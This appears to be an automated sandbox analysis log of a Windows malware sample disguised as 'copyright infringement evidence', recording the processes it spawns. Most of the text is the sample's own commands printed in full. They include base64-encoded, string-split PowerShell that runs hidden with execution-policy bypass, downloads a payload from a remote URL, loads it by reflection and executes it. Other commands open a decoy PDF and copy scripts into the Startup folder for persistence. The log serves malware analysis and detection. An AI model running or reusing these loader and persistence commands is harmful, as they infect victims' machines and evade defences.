'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' 